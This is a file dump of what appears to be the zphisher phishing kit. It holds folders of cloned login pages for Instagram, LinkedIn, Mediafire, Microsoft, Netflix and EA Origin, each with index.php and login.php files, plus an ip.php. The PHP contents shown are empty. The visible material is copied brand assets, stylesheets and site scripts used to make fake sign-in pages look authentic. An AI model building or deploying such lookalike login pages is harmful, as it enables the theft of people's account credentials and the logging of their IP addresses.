19 | 20 | 21 | 22 | 23 | -------------------------------------------------------------------------------- /.sites/ig_followers/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sites/ig_followers/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.sites/ig_verify/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sites/ig_verify/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.sites/ig_verify/login2.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.sites/insta_followers/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sites/insta_followers/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.sites/instagram/badge_android_english-en.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/htr-tech/zphisher/65b99bccaa746ec3edda4291ec7f4048fbd49771/.sites/instagram/badge_android_english-en.png -------------------------------------------------------------------------------- /.sites/instagram/badge_ios_english-en.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/htr-tech/zphisher/65b99bccaa746ec3edda4291ec7f4048fbd49771/.sites/instagram/badge_ios_english-en.png -------------------------------------------------------------------------------- /.sites/instagram/favicon.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/htr-tech/zphisher/65b99bccaa746ec3edda4291ec7f4048fbd49771/.sites/instagram/favicon.png -------------------------------------------------------------------------------- /.sites/instagram/home-phones.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/htr-tech/zphisher/65b99bccaa746ec3edda4291ec7f4048fbd49771/.sites/instagram/home-phones.png -------------------------------------------------------------------------------- /.sites/instagram/home-phones@2x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/htr-tech/zphisher/65b99bccaa746ec3edda4291ec7f4048fbd49771/.sites/instagram/home-phones@2x.png -------------------------------------------------------------------------------- /.sites/instagram/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sites/instagram/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.sites/instagram/screenshot1.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/htr-tech/zphisher/65b99bccaa746ec3edda4291ec7f4048fbd49771/.sites/instagram/screenshot1.jpg -------------------------------------------------------------------------------- /.sites/instagram/screenshot2.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/htr-tech/zphisher/65b99bccaa746ec3edda4291ec7f4048fbd49771/.sites/instagram/screenshot2.jpg -------------------------------------------------------------------------------- /.sites/instagram/screenshot3.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/htr-tech/zphisher/65b99bccaa746ec3edda4291ec7f4048fbd49771/.sites/instagram/screenshot3.jpg -------------------------------------------------------------------------------- /.sites/instagram/screenshot4.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/htr-tech/zphisher/65b99bccaa746ec3edda4291ec7f4048fbd49771/.sites/instagram/screenshot4.jpg -------------------------------------------------------------------------------- /.sites/instagram/screenshot5.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/htr-tech/zphisher/65b99bccaa746ec3edda4291ec7f4048fbd49771/.sites/instagram/screenshot5.jpg -------------------------------------------------------------------------------- /.sites/instagram/sprite_core_2x_bcd90c1d4868.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/htr-tech/zphisher/65b99bccaa746ec3edda4291ec7f4048fbd49771/.sites/instagram/sprite_core_2x_bcd90c1d4868.png -------------------------------------------------------------------------------- /.sites/instagram/sprite_core_32f0a4f27407.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/htr-tech/zphisher/65b99bccaa746ec3edda4291ec7f4048fbd49771/.sites/instagram/sprite_core_32f0a4f27407.png -------------------------------------------------------------------------------- /.sites/ip.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.sites/linkedin/favicon.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/htr-tech/zphisher/65b99bccaa746ec3edda4291ec7f4048fbd49771/.sites/linkedin/favicon.ico -------------------------------------------------------------------------------- /.sites/linkedin/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sites/linkedin/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.sites/mediafire/favicon.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/htr-tech/zphisher/65b99bccaa746ec3edda4291ec7f4048fbd49771/.sites/mediafire/favicon.ico -------------------------------------------------------------------------------- /.sites/mediafire/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sites/mediafire/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.sites/microsoft/ellipsis_grey.svg: -------------------------------------------------------------------------------- 1 | assets -------------------------------------------------------------------------------- /.sites/microsoft/ellipsis_white.svg: -------------------------------------------------------------------------------- 1 | assets -------------------------------------------------------------------------------- /.sites/microsoft/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sites/microsoft/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.sites/microsoft/microsoft_logo.svg: -------------------------------------------------------------------------------- 1 | assets -------------------------------------------------------------------------------- /.sites/microsoft/prefetch.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Prefetch 5 | 6 | 7 | 8 | 14 | 15 | 16 | 20 | 21 | 22 | 23 | 24 | A -------------------------------------------------------------------------------- /.sites/microsoft/sprite1.css: -------------------------------------------------------------------------------- 1 | .image-adchoices_icon-png{background:url('adchoices_icon.png');width:12px;height:12px}.image-olk_logo_white_cropped-png{background:url('olk_logo_white_cropped.png');width:265px;height:310px}.image-owa_brand-png{background:url('owa_brand.png');width:160px;height:30px}.image-readingpane_recipientwell_callout-png{background:url('readingpane_recipientwell_callout.png');width:370px;height:245px}.image-loading_blackbg-gif{background:url('loading_blackbg.gif');width:16px;height:16px}.image-loading_whitebg-gif{background:url('loading_whitebg.gif');width:16px;height:16px}.image-thinking16_blue-gif{background:url('thinking16_blue.gif');width:16px;height:16px}.image-thinking16_grey-gif{background:url('thinking16_grey.gif');width:16px;height:16px}.image-thinking16_white-gif{background:url('thinking16_white.gif');width:16px;height:16px}.image-thinking24-gif{background:url('thinking24.gif');width:24px;height:24px}.image-thinking32_blue-gif{background:url('thinking32_blue.gif');width:32px;height:32px}.image-thinking32_grey-gif{background:url('thinking32_grey.gif');width:32px;height:32px}.image-thinking32_white-gif{background:url('thinking32_white.gif');width:32px;height:32px}.image-r_jpg-png{width:75px;height:75px;background:url('sprite1.mouse.png') -0 -0}.image-clutter_delete_all-png{width:32px;height:32px;background:url('sprite1.mouse.png') -77px -0}.image-clutter_delete_all_p-png{width:32px;height:32px;background:url('sprite1.mouse.png') -111px -0}.image-listview_buscheck_single-png{width:16px;height:32px;background:url('sprite1.mouse.png') -145px -0}.image-listview_buscheck_top-png{width:16px;height:32px;background:url('sprite1.mouse.png') -163px -0}.image-listview_busstop_bottom-png{width:16px;height:32px;background:url('sprite1.mouse.png') -181px -0}.image-listview_busstop_empty-png{width:16px;height:32px;background:url('sprite1.mouse.png') -199px -0}.image-listview_busstop_middle-png{width:16px;height:32px;background:url('sprite1.mouse.png') -217px -0}.image-office_logo_white_small-png{width:81px;height:26px;background:url('sprite1.mouse.png') -235px -0}.image-dc-gdoc-png{width:20px;height:20px;background:url('sprite1.mouse.png') -318px -0}.image-dc-gsheet-png{width:20px;height:20px;background:url('sprite1.mouse.png') -340px -0}.image-dc-gslide-png{width:20px;height:20px;background:url('sprite1.mouse.png') -362px -0}.image-fberror4-png{width:18px;height:18px;background:url('sprite1.mouse.png') -384px -0}.image-googerror2-png{width:18px;height:18px;background:url('sprite1.mouse.png') -404px -0}.image-lierror2-png{width:18px;height:18px;background:url('sprite1.mouse.png') -424px -0}.image-sinweerror2-png{width:18px;height:18px;background:url('sprite1.mouse.png') -444px -0}.image-twitrerror2-png{width:18px;height:18px;background:url('sprite1.mouse.png') -464px -0}.image-yhooerror2-png{width:18px;height:18px;background:url('sprite1.mouse.png') -484px -0}.image-abchactive1-png{width:16px;height:16px;background:url('sprite1.mouse.png') -504px -0}.image-chevrons_down-png{width:16px;height:16px;background:url('sprite1.mouse.png') -522px -0}.image-close_p-png{width:16px;height:16px;background:url('sprite1.mouse.png') -540px -0}.image-dc-accdb-png{width:16px;height:16px;background:url('sprite1.mouse.png') -558px -0}.image-dc-aspx-png{width:16px;height:16px;background:url('sprite1.mouse.png') -576px -0}.image-dc-bmp-png{width:16px;height:16px;background:url('sprite1.mouse.png') -318px -22px}.image-dc-docx-png{width:16px;height:16px;background:url('sprite1.mouse.png') -336px -22px}.image-dc-exe-png{width:16px;height:16px;background:url('sprite1.mouse.png') -354px -22px}.image-dc-generic-png{width:16px;height:16px;background:url('sprite1.mouse.png') -372px -22px}.image-dc-gif-png{width:16px;height:16px;background:url('sprite1.mouse.png') -390px -22px}.image-dc-jpg-png{width:16px;height:16px;background:url('sprite1.mouse.png') -408px -22px}.image-dc-lync-png{width:16px;height:16px;background:url('sprite1.mouse.png') -426px -22px}.image-dc-mpg-png{width:16px;height:16px;background:url('sprite1.mouse.png') -444px -22px}.image-dc-msg-png{width:16px;height:16px;background:url('sprite1.mouse.png') -462px -22px}.image-dc-msg_attachment-png{width:16px;height:16px;background:url('sprite1.mouse.png') -480px -22px}.image-dc-one-png{width:16px;height:16px;background:url('sprite1.mouse.png') -498px -22px}.image-dc-pblsh-png{width:16px;height:16px;background:url('sprite1.mouse.png') -516px -22px}.image-dc-pdf-png{width:16px;height:16px;background:url('sprite1.mouse.png') -534px -22px}.image-dc-png-png{width:16px;height:16px;background:url('sprite1.mouse.png') -552px -22px}.image-dc-pptx-png{width:16px;height:16px;background:url('sprite1.mouse.png') -570px -22px}.image-dc-rpmsg-png{width:16px;height:16px;background:url('sprite1.mouse.png') -318px -40px}.image-dc-txt-png{width:16px;height:16px;background:url('sprite1.mouse.png') -336px -40px}.image-dc-vsd-png{width:16px;height:16px;background:url('sprite1.mouse.png') -354px -40px}.image-dc-wv-png{width:16px;height:16px;background:url('sprite1.mouse.png') -372px -40px}.image-dc-xlsx-png{width:16px;height:16px;background:url('sprite1.mouse.png') -390px -40px}.image-dc-zip-png{width:16px;height:16px;background:url('sprite1.mouse.png') -408px -40px}.image-event_accepted-png{width:16px;height:16px;background:url('sprite1.mouse.png') -426px -40px}.image-event_declined-png{width:16px;height:16px;background:url('sprite1.mouse.png') -444px -40px}.image-event_tentative-png{width:16px;height:16px;background:url('sprite1.mouse.png') -462px -40px}.image-fbactive4-png{width:16px;height:16px;background:url('sprite1.mouse.png') -480px -40px}.image-googactive2-png{width:16px;height:16px;background:url('sprite1.mouse.png') -498px -40px}.image-liactive-png{width:16px;height:16px;background:url('sprite1.mouse.png') -516px -40px}.image-mark_not_clutter-png{width:16px;height:16px;background:url('sprite1.mouse.png') -534px -40px}.image-mark_not_clutter_h-png{width:16px;height:16px;background:url('sprite1.mouse.png') -552px -40px}.image-response_approve-png{width:16px;height:16px;background:url('sprite1.mouse.png') -570px -40px}.image-response_reject-png{width:16px;height:16px;background:url('sprite1.mouse.png') -318px -58px}.image-response_request-png{width:16px;height:16px;background:url('sprite1.mouse.png') -336px -58px}.image-sinweactive-png{width:16px;height:16px;background:url('sprite1.mouse.png') -354px -58px}.image-skypeactive2-png{width:16px;height:16px;background:url('sprite1.mouse.png') -372px -58px}.image-task_red-png{width:16px;height:16px;background:url('sprite1.mouse.png') -390px -58px}.image-task_red_h-png{width:16px;height:16px;background:url('sprite1.mouse.png') -408px -58px}.image-twitractive2-png{width:16px;height:16px;background:url('sprite1.mouse.png') -426px -58px}.image-voicemail_irm-png{width:16px;height:16px;background:url('sprite1.mouse.png') -444px -58px}.image-yhooactive2-png{width:16px;height:16px;background:url('sprite1.mouse.png') -462px -58px}.image-task_reoccurring-png{width:15px;height:16px;background:url('sprite1.mouse.png') -480px -58px}.image-task-png{width:14px;height:16px;background:url('sprite1.mouse.png') -497px -58px}.image-triangle_down_small-png{width:12px;height:12px;background:url('sprite1.mouse.png') -513px -58px}.image-navigation_close-png{width:11px;height:11px;background:url('sprite1.mouse.png') -527px -58px}.image-clear1x1-gif{width:1px;height:1px;background:url('sprite1.mouse.png') -540px -58px}.csimg{padding:0;border:none;background-repeat:no-repeat;-webkit-touch-callout:none}span.csimg{-ms-high-contrast-adjust:none} -------------------------------------------------------------------------------- /.sites/microsoft/sprite1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/htr-tech/zphisher/65b99bccaa746ec3edda4291ec7f4048fbd49771/.sites/microsoft/sprite1.png -------------------------------------------------------------------------------- /.sites/netflix/FB-f-Logo__blue_57.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/htr-tech/zphisher/65b99bccaa746ec3edda4291ec7f4048fbd49771/.sites/netflix/FB-f-Logo__blue_57.png -------------------------------------------------------------------------------- /.sites/netflix/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sites/netflix/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.sites/origin/EA_Origin_Lockup_Black.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/htr-tech/zphisher/65b99bccaa746ec3edda4291ec7f4048fbd49771/.sites/origin/EA_Origin_Lockup_Black.png -------------------------------------------------------------------------------- /.sites/origin/api.js: -------------------------------------------------------------------------------- 1 | /* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function() {var CFG='___grecaptcha_cfg';if(!window[CFG]){window[CFG]={};}var GR='grecaptcha';if(!window[GR]){window[GR]={};}window[GR].ready=window[GR].ready||function(f){(window[CFG]['fns']=window[CFG]['fns']||[]).push(f);};(window[CFG]['render']=window[CFG]['render']||[]).push('onload');window['__google_recaptcha_client']=true;var po=document.createElement('script');po.type='text/javascript';po.async=true;po.src='https://www.gstatic.com/recaptcha/api2/v1528855115741/recaptcha__en.js';var elem=document.querySelector('script[nonce]');var n=elem&&(elem['nonce']||elem.getAttribute('nonce'));if(n){po.setAttribute('nonce',n);}var s=document.getElementsByTagName('script')[0];s.parentNode.insertBefore(po, s);})(); -------------------------------------------------------------------------------- /.sites/origin/css.css: -------------------------------------------------------------------------------- 1 | /* cyrillic-ext */ 2 | @font-face { 3 | font-family: 'Open Sans'; 4 | font-style: normal; 5 | font-weight: 300; 6 | src: local('Open Sans Light'), local('OpenSans-Light'), url(https://fonts.gstatic.com/s/opensans/v15/mem5YaGs126MiZpBA-UN_r8OX-hpOqc.woff2) format('woff2'); 7 | unicode-range: U+0460-052F, U+1C80-1C88, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F; 8 | } 9 | /* cyrillic */ 10 | @font-face { 11 | font-family: 'Open Sans'; 12 | font-style: normal; 13 | font-weight: 300; 14 | src: local('Open Sans Light'), local('OpenSans-Light'), url(https://fonts.gstatic.com/s/opensans/v15/mem5YaGs126MiZpBA-UN_r8OVuhpOqc.woff2) format('woff2'); 15 | unicode-range: U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116; 16 | } 17 | /* greek-ext */ 18 | @font-face { 19 | font-family: 'Open Sans'; 20 | font-style: normal; 21 | font-weight: 300; 22 | src: local('Open Sans Light'), local('OpenSans-Light'), url(https://fonts.gstatic.com/s/opensans/v15/mem5YaGs126MiZpBA-UN_r8OXuhpOqc.woff2) format('woff2'); 23 | unicode-range: U+1F00-1FFF; 24 | } 25 | /* greek */ 26 | @font-face { 27 | font-family: 'Open Sans'; 28 | font-style: normal; 29 | font-weight: 300; 30 | src: local('Open Sans Light'), local('OpenSans-Light'), url(https://fonts.gstatic.com/s/opensans/v15/mem5YaGs126MiZpBA-UN_r8OUehpOqc.woff2) format('woff2'); 31 | unicode-range: U+0370-03FF; 32 | } 33 | /* vietnamese */ 34 | @font-face { 35 | font-family: 'Open Sans'; 36 | font-style: normal; 37 | font-weight: 300; 38 | src: local('Open Sans Light'), local('OpenSans-Light'), url(https://fonts.gstatic.com/s/opensans/v15/mem5YaGs126MiZpBA-UN_r8OXehpOqc.woff2) format('woff2'); 39 | unicode-range: U+0102-0103, U+0110-0111, U+1EA0-1EF9, U+20AB; 40 | } 41 | /* latin-ext */ 42 | @font-face { 43 | font-family: 'Open Sans'; 44 | font-style: normal; 45 | font-weight: 300; 46 | src: local('Open Sans Light'), local('OpenSans-Light'), url(https://fonts.gstatic.com/s/opensans/v15/mem5YaGs126MiZpBA-UN_r8OXOhpOqc.woff2) format('woff2'); 47 | unicode-range: U+0100-024F, U+0259, U+1E00-1EFF, U+2020, U+20A0-20AB, U+20AD-20CF, U+2113, U+2C60-2C7F, U+A720-A7FF; 48 | } 49 | /* latin */ 50 | @font-face { 51 | font-family: 'Open Sans'; 52 | font-style: normal; 53 | font-weight: 300; 54 | src: local('Open Sans Light'), local('OpenSans-Light'), url(https://fonts.gstatic.com/s/opensans/v15/mem5YaGs126MiZpBA-UN_r8OUuhp.woff2) format('woff2'); 55 | unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+2000-206F, U+2074, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD; 56 | } 57 | /* cyrillic-ext */ 58 | @font-face { 59 | font-family: 'Open Sans'; 60 | font-style: normal; 61 | font-weight: 400; 62 | src: local('Open Sans Regular'), local('OpenSans-Regular'), url(https://fonts.gstatic.com/s/opensans/v15/mem8YaGs126MiZpBA-UFWJ0bbck.woff2) format('woff2'); 63 | unicode-range: U+0460-052F, U+1C80-1C88, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F; 64 | } 65 | /* cyrillic */ 66 | @font-face { 67 | font-family: 'Open Sans'; 68 | font-style: normal; 69 | font-weight: 400; 70 | src: local('Open Sans Regular'), local('OpenSans-Regular'), url(https://fonts.gstatic.com/s/opensans/v15/mem8YaGs126MiZpBA-UFUZ0bbck.woff2) format('woff2'); 71 | unicode-range: U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116; 72 | } 73 | /* greek-ext */ 74 | @font-face { 75 | font-family: 'Open Sans'; 76 | font-style: normal; 77 | font-weight: 400; 78 | src: local('Open Sans Regular'), local('OpenSans-Regular'), url(https://fonts.gstatic.com/s/opensans/v15/mem8YaGs126MiZpBA-UFWZ0bbck.woff2) format('woff2'); 79 | unicode-range: U+1F00-1FFF; 80 | } 81 | /* greek */ 82 | @font-face { 83 | font-family: 'Open Sans'; 84 | font-style: normal; 85 | font-weight: 400; 86 | src: local('Open Sans Regular'), local('OpenSans-Regular'), url(https://fonts.gstatic.com/s/opensans/v15/mem8YaGs126MiZpBA-UFVp0bbck.woff2) format('woff2'); 87 | unicode-range: U+0370-03FF; 88 | } 89 | /* vietnamese */ 90 | @font-face { 91 | font-family: 'Open Sans'; 92 | font-style: normal; 93 | font-weight: 400; 94 | src: local('Open Sans Regular'), local('OpenSans-Regular'), url(https://fonts.gstatic.com/s/opensans/v15/mem8YaGs126MiZpBA-UFWp0bbck.woff2) format('woff2'); 95 | unicode-range: U+0102-0103, U+0110-0111, U+1EA0-1EF9, U+20AB; 96 | } 97 | /* latin-ext */ 98 | @font-face { 99 | font-family: 'Open Sans'; 100 | font-style: normal; 101 | font-weight: 400; 102 | src: local('Open Sans Regular'), local('OpenSans-Regular'), url(https://fonts.gstatic.com/s/opensans/v15/mem8YaGs126MiZpBA-UFW50bbck.woff2) format('woff2'); 103 | unicode-range: U+0100-024F, U+0259, U+1E00-1EFF, U+2020, U+20A0-20AB, U+20AD-20CF, U+2113, U+2C60-2C7F, U+A720-A7FF; 104 | } 105 | /* latin */ 106 | @font-face { 107 | font-family: 'Open Sans'; 108 | font-style: normal; 109 | font-weight: 400; 110 | src: local('Open Sans Regular'), local('OpenSans-Regular'), url(https://fonts.gstatic.com/s/opensans/v15/mem8YaGs126MiZpBA-UFVZ0b.woff2) format('woff2'); 111 | unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+2000-206F, U+2074, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD; 112 | } 113 | /* cyrillic-ext */ 114 | @font-face { 115 | font-family: 'Open Sans'; 116 | font-style: normal; 117 | font-weight: 600; 118 | src: local('Open Sans SemiBold'), local('OpenSans-SemiBold'), url(https://fonts.gstatic.com/s/opensans/v15/mem5YaGs126MiZpBA-UNirkOX-hpOqc.woff2) format('woff2'); 119 | unicode-range: U+0460-052F, U+1C80-1C88, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F; 120 | } 121 | /* cyrillic */ 122 | @font-face { 123 | font-family: 'Open Sans'; 124 | font-style: normal; 125 | font-weight: 600; 126 | src: local('Open Sans SemiBold'), local('OpenSans-SemiBold'), url(https://fonts.gstatic.com/s/opensans/v15/mem5YaGs126MiZpBA-UNirkOVuhpOqc.woff2) format('woff2'); 127 | unicode-range: U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116; 128 | } 129 | /* greek-ext */ 130 | @font-face { 131 | font-family: 'Open Sans'; 132 | font-style: normal; 133 | font-weight: 600; 134 | src: local('Open Sans SemiBold'), local('OpenSans-SemiBold'), url(https://fonts.gstatic.com/s/opensans/v15/mem5YaGs126MiZpBA-UNirkOXuhpOqc.woff2) format('woff2'); 135 | unicode-range: U+1F00-1FFF; 136 | } 137 | /* greek */ 138 | @font-face { 139 | font-family: 'Open Sans'; 140 | font-style: normal; 141 | font-weight: 600; 142 | src: local('Open Sans SemiBold'), local('OpenSans-SemiBold'), url(https://fonts.gstatic.com/s/opensans/v15/mem5YaGs126MiZpBA-UNirkOUehpOqc.woff2) format('woff2'); 143 | unicode-range: U+0370-03FF; 144 | } 145 | /* vietnamese */ 146 | @font-face { 147 | font-family: 'Open Sans'; 148 | font-style: normal; 149 | font-weight: 600; 150 | src: local('Open Sans SemiBold'), local('OpenSans-SemiBold'), url(https://fonts.gstatic.com/s/opensans/v15/mem5YaGs126MiZpBA-UNirkOXehpOqc.woff2) format('woff2'); 151 | unicode-range: U+0102-0103, U+0110-0111, U+1EA0-1EF9, U+20AB; 152 | } 153 | /* latin-ext */ 154 | @font-face { 155 | font-family: 'Open Sans'; 156 | font-style: normal; 157 | font-weight: 600; 158 | src: local('Open Sans SemiBold'), local('OpenSans-SemiBold'), url(https://fonts.gstatic.com/s/opensans/v15/mem5YaGs126MiZpBA-UNirkOXOhpOqc.woff2) format('woff2'); 159 | unicode-range: U+0100-024F, U+0259, U+1E00-1EFF, U+2020, U+20A0-20AB, U+20AD-20CF, U+2113, U+2C60-2C7F, U+A720-A7FF; 160 | } 161 | /* latin */ 162 | @font-face { 163 | font-family: 'Open Sans'; 164 | font-style: normal; 165 | font-weight: 600; 166 | src: local('Open Sans SemiBold'), local('OpenSans-SemiBold'), url(https://fonts.gstatic.com/s/opensans/v15/mem5YaGs126MiZpBA-UNirkOUuhp.woff2) format('woff2'); 167 | unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+2000-206F, U+2074, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD; 168 | } 169 | -------------------------------------------------------------------------------- /.sites/origin/iframe_api.js: -------------------------------------------------------------------------------- 1 | 2 | if (!window['YT']) {var YT = {loading: 0,loaded: 0};}if (!window['YTConfig']) {var YTConfig = {'host': 'http://www.youtube.com'};}if (!YT.loading) {YT.loading = 1;(function(){var l = [];YT.ready = function(f) {if (YT.loaded) {f();} else {l.push(f);}};window.onYTReady = function() {YT.loaded = 1;for (var i = 0; i < l.length; i++) {try {l[i]();} catch (e) {}}};YT.setConfig = function(c) {for (var k in c) {if (c.hasOwnProperty(k)) {YTConfig[k] = c[k];}}};var a = document.createElement('script');a.type = 'text/javascript';a.id = 'www-widgetapi-script';a.src = 'https://s.ytimg.com/yts/jsbin/www-widgetapi-vfl3m9ZW-/www-widgetapi.js';a.async = true;var c = document.currentScript;if (c) {var n = c.nonce || c.getAttribute('nonce');if (n) {a.setAttribute('nonce', n);}}var b = document.getElementsByTagName('script')[0];b.parentNode.insertBefore(a, b);})();} -------------------------------------------------------------------------------- /.sites/origin/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sites/origin/jquery_002.js: -------------------------------------------------------------------------------- 1 | (function(a,b){a.fn.originLayout=function(e,g){var f={};var d={init:function(){a("form").bind("submit.originLayout",d.events.originFormSubmit);a(".panel-action-area .btn-next").bind("click.originLayout",d.events.originNextButtonClick)},events:{originFormSubmit:function(h){a(".panel-action-area .origin-ux-button",this).addClass("disabled").unbind("click").bind("click",function(i){i.preventDefault()})},originNextButtonClick:function(h){if(a(this).hasClass("disabled")){h.stopImmediatePropagation()}else{a(this).parent(".panel-action-area").find(".origin-ux-button").addClass("disabled")}return false}},helpers:{}};var c=["init"];if(typeof e==="object"||!e){d.init()}else{if(a.inArray(e,c)){}}}})(jQuery);$(document).ready(function(){$.fn.originLayout()}); -------------------------------------------------------------------------------- /.sites/origin/jquery_004.js: -------------------------------------------------------------------------------- 1 | (function(a,b){var c=function(){var e=function(h){var g=String.fromCharCode(h.which);if(g.toUpperCase()===g&&g.toLowerCase()!==g&&!h.shiftKey){a("#password").siblings(".otkicon-capslock").addClass("otkinput-capslock-visible")}else{a("#password").siblings(".otkicon-capslock").removeClass("otkinput-capslock-visible")}};var d=function(){if(a(".otkinput-capslock:visible").length>0){a("#password").siblings(".otkicon-capslock").removeClass("otkinput-capslock-visible")}};a("#password").on("keypress",e);a("#password").on("focusout",d);a(".otkcheckbox input, .otkradio input, .otkselect select").focusin(function(g){g.preventDefault();a(this).parent("span").addClass("focus")}).focusout(function(g){g.preventDefault();a(this).parent("span").removeClass("focus")});var f=function(g){if(!g){return}g.each(function(){var n=2;var r=parseFloat(a(this).css("padding-top"))+n;var j=parseFloat(a(this).css("padding-right"))+n;var i=parseFloat(a(this).css("padding-bottom"))+n;var k=parseFloat(a(this).css("padding-left"))+n;var q=r+"px "+j+"px "+i+"px "+k+"px";a(this).css("padding",q);var h=parseFloat(a(this).css("margin-top"))-n;var p=parseFloat(a(this).css("margin-right"))-n;var m=parseFloat(a(this).css("margin-bottom"))-n;var l=parseFloat(a(this).css("margin-left"))-n;var o=h+"px "+p+"px "+m+"px "+l+"px";a(this).css("margin",o);a(this).css("outline-offset","-2px");a(this).hover(function(){a(this).blur()},function(){a(this).blur()});a(this).click(function(){a(this).blur()});a(this).focus(function(){a(this).addClass("outline-focus")});a(this).blur(function(){a(this).removeClass("outline-focus")})})};f(a("a.forgot-password-link"));f(a("a.registration-link"));f(a("div#panel-privacy-settings > p > a"));a(a("div#panel-privacy-settings > p > a")).css("outline-offset","0px");f(a("label#label-readAccept > a"));f(a("#uploader.container-inner > .file-select-note > span > a"));f(a("#panel-profile-upgrade > .panel-contents > .panel-content > p > a"));f(a("#panel-nux > .panel-contents > .panel-content > p > a"))};a(document).ready(function(){c()})})(jQuery);"use strict";var QWebChannelMessageTypes={signal:1,propertyUpdate:2,init:3,idle:4,debug:5,invokeMethod:6,connectToSignal:7,disconnectFromSignal:8,setProperty:9,response:10,};var QWebChannel=function(c,a){if(typeof c!=="object"||typeof c.send!=="function"){console.error("The QWebChannel expects a transport object with a send function and onmessage callback property. Given is: transport: "+typeof(c)+", transport.send: "+typeof(c.send));return}var b=this;this.transport=c;this.send=function(d){if(typeof(d)!=="string"){d=JSON.stringify(d)}b.transport.send(d)};this.transport.onmessage=function(d){var e=d.data;if(typeof e==="string"){e=JSON.parse(e)}switch(e.type){case QWebChannelMessageTypes.signal:b.handleSignal(e);break;case QWebChannelMessageTypes.response:b.handleResponse(e);break;case QWebChannelMessageTypes.propertyUpdate:b.handlePropertyUpdate(e);break;default:console.error("invalid message received:",d.data);break}};this.execCallbacks={};this.execId=0;this.exec=function(d,e){if(!e){b.send(d);return}if(b.execId===Number.MAX_VALUE){b.execId=Number.MIN_VALUE}if(d.hasOwnProperty("id")){console.error("Cannot exec message with property id: "+JSON.stringify(d));return}d.id=b.execId++;b.execCallbacks[d.id]=e;b.send(d)};this.objects={};this.handleSignal=function(e){var d=b.objects[e.object];if(d){d.signalEmitted(e.signal,e.args)}else{console.warn("Unhandled signal: "+e.object+"::"+e.signal)}};this.handleResponse=function(d){if(!d.hasOwnProperty("id")){console.error("Invalid response message received: ",JSON.stringify(d));return}b.execCallbacks[d.id](d.data);delete b.execCallbacks[d.id]};this.handlePropertyUpdate=function(f){for(var e in f.data){var g=f.data[e];var d=b.objects[g.object];if(d){d.propertyUpdate(g.signals,g.properties)}else{console.warn("Unhandled property update: "+g.object+"::"+g.signal)}}b.exec({type:QWebChannelMessageTypes.idle})};this.debug=function(d){b.send({type:QWebChannelMessageTypes.debug,data:d})};b.exec({type:QWebChannelMessageTypes.init},function(e){for(var f in e){var d=new QObject(f,e[f],b)}for(var f in b.objects){b.objects[f].unwrapProperties()}if(a){a(b)}b.exec({type:QWebChannelMessageTypes.idle})})};function QObject(d,g,e){this.__id__=d;e.objects[d]=this;this.__objectSignals__={};this.__propertyCache__={};var c=this;this.unwrapQObject=function(l){if(l instanceof Array){var m=new Array(l.length);for(var n=0;n -------------------------------------------------------------------------------- /.sites/origin/originX-pc-common.css: -------------------------------------------------------------------------------- 1 | .form-container{display:block;position:static;clear:both;width:480px;margin:auto;top:calc(50% - 324px);left:calc(50% - 240px);-webkit-animation:none;-moz-animation:none;-o-animation:none;animation:none}.views{border-radius:0 0 4px 